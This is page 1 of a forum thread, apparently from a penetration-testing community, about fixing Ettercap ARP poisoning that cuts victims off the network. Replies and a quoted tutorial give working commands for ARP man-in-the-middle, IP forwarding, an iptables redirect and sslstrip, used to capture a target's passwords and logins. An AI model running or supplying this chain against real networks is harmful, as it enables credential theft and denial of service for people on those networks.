Page 1 of 2 12 LastLast
Results 1 to 10 of 12

Thread: Ettercap + Arp poisoning = Effectively DoS

  1. #1
    Junior Member
    Join Date
    Feb 2010
    Posts
    26

    Unhappy Ettercap + Arp poisoning = Effectively DoS

    Hey guys I would post this over at the ettercap forums, but they are already all but dead, and this question has been posed there as well.
    So I am hoping that the almighty forum gurus can help me.

    I'll quote a post by a user on the ettercap forums which effectively describes my problem too.

    "This problem happens in both the ncurses and GTK interfaces.

    I run unified sniffing in promiscuous mode. I am able to scan for hosts, to list one client on the target 1 list and the gateway on the target 2. Everything seems to go very well until I start the Mitm Arp poisoning.

    At this point, I receive tons of packets from the IP in the first list, so I'm assuming it has been poisoned with no problem. The problem, as far as I can surmise is in my system. Not a single packet that my machine recieves gets forwarded through to the gateway, and thus I essentially kill the connectivity of that user to the internet.

    The log at the bottom of the screen shows hundreds of these entries:

    SEND L3 ERROR: xxxx byte packet (0800:06) destined to xxx.xxx.xxx.xxx was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Invalid argument)

    I've tried looking into libnet and kernel iptables but I really don't want to get in over my head. Does anybody have some suggestions for me? I would really appreciate it. Thanks!"


    chkpoison reveals however that poisoning has not occured, so how is it, that this effectively kills the connectivity?

    Are there any solutions other than using another form of MITM attack?

  2. #2
    Member imported_onryo's Avatar
    Join Date
    Apr 2009
    Posts
    109

    Default

    Hmmm ettercap should forward the data. Try using -u (think it was a little "u") to turn off ip_forward from ettercap and do it like this.

    ettercap -T -u -q -i wlan0 -M arp /victum ip/ //
    echo "1" > /proc/sys/net/ipv4/ip_forward

    remember the -i wlan0 is MY interphase. You might have another.

    chkpoison reveals however that poisoning has not occured,
    Means just that. This does not look good. Could be a million reasons for this. Are you to far from the target. I am guessing you are not using BT4 since you have a working GTK. Is it set up right? In GTK under mitm try the one way poison.

    good luck
    onryo
    Let me explain officer, I am not a hacker. I am a security tester of sorts!

  3. #3
    Junior Member
    Join Date
    Feb 2010
    Posts
    26

    Default

    I'm using BT4, I just used
    Code:
    apt-get install ettercap
    (I believe it was ettercap, but I can't remember) anyway that solved the problem that comes with BT4.

    The reason why I wanted to use ARP is because of SSLstrip, but after reading threads that ettercap forwards by auto I omitted the command you included. I will try ettercap with -u and add the command once again.

    Thanks for the help.

    Ps. Saw you mentioning using Swedish XP3, Svensk?

  4. #4
    Member imported_onryo's Avatar
    Join Date
    Apr 2009
    Posts
    109

    Default

    Yup I am Swedish, if you want to write in Swedish you can send me a private mail here on the forums.

    If you want to get SSLstrip working with ettercap I have a howto here on the forums. Also have a "get ettercap-GTK" working here on the forums. GTK does not always play nice with ubuntu using ettecap.

    Ha det sċ bra
    onryo

    PS if you live in Sweden you might also know me by the name ph0t0n depending on who you hang out with. Are you L***** - Carlos?
    Let me explain officer, I am not a hacker. I am a security tester of sorts!

  5. #5
    Junior Member
    Join Date
    Feb 2010
    Posts
    26

    Default

    Okay so I have tried all the tips to no luck.

    I'll quote your tutorial as well;

    As I sit here watching my boss surf the net in firefox (he asked me to see what I could exploit) using ettercap with the remote_brower plugin I got a little anoyed to see that some of the sites he rolled into were SSL. No big deal I was thinking.

    Now I got the http sites rolling into firefox and the SSLstrip just passing password, logins and other junk into the log file.

    Code:
    first fixed the /etc/etter.conf
    ec_uid = 0
    ec_gid = 0
    remote_browser = "firefox -remote openurl(h t t p://%host%url)"
    
    
    Then just fired off
    # echo "1" > /proc/sys/net/ipv4/ip_forward
    # xhost local:root
    # ettercap -T -q -i wlan0 -M arp /192.168.0.101(boss ip)/ //
    # p
    # remote_browser
    (You can do the above ettercap in one command but it seems a little unstable)
    # iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
    # python ./sslstrip.py -p -f -l 8080
    What I want is the SSL sites also rolling into firefox and not just passing the passworld to the log file. I am guessing it has something to do with remote_browser not listening to SSLstrip after its done its magic on port 8080 or something along that line. Everything else works just fine.

    All the best
    onryo
    ___________
    As I mentioned I've read somewhere (I believe it was actually on these forums) that if you run a double session of ipforwarding (For instance once on ettercap and then once at kernel level) it would cause problems, but it seems to be working here for you.

    Could someone care to verify or explain?

    I'm not asking to be spoon fed and I'm sorry if it is taken as such guys, but I'm really trying to the best of my abilities.

    I'll try to learn bash after my finals are over so I can actually try to do something for myself...

  6. #6
    Just burned his ISO
    Join Date
    Jan 2010
    Location
    NY, US
    Posts
    5

    Default

    I had this problem too but I fixed it by making sure the ip forwarding was enabled.

  7. #7
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    5

    Default

    I have this problem too, but it effectively kills everyone on the network. I have five people on the network all hooked up through wireless, and it literally stops everyone from browsing the web.

    Cant figure out a way to fix it either.

  8. #8
    Member
    Join Date
    Dec 2007
    Location
    @InterN0T
    Posts
    315

    Default

    Did you remember to run ettercap -g as sudo or root? Else you will most likely have a few problems since I think it's using raw sockets.
    [quote][I]I realized, that I had fallen down from the top of the mountain into a deep, terrifying and dark hole, just to find out that another mountain in front of me, much greater than the previous, was the next step in life. I began to wander uphill on the next mountain of life while I knew it would be much harder than the previous mountain. [/I]- MaXe[/quote]

  9. #9
    Junior Member
    Join Date
    May 2009
    Posts
    42

    Default

    Quote Originally Posted by MaXe Legend View Post
    Did you remember to run ettercap -g as sudo or root? Else you will most likely have a few problems since I think it's using raw sockets.
    I'd agree with that I remeber being advised of this when I started experimenting with ettercap. I also recall exiting the program without stopping the attack / re-ARPing the victim. this resulted in exactly the DOS scenario you're describing I realised this is yet another way an inexperienced "skiddie" can make a pest of himself.

  10. #10
    Good friend of the forums
    Join Date
    Jun 2008
    Posts
    425

    Default

    SEND L3 ERROR: xxxx byte packet (0800:06) destined to xxx.xxx.xxx.xxx was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Invalid argument)
    Try ifconfig eth0 mtu 1500
    it worked for me

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •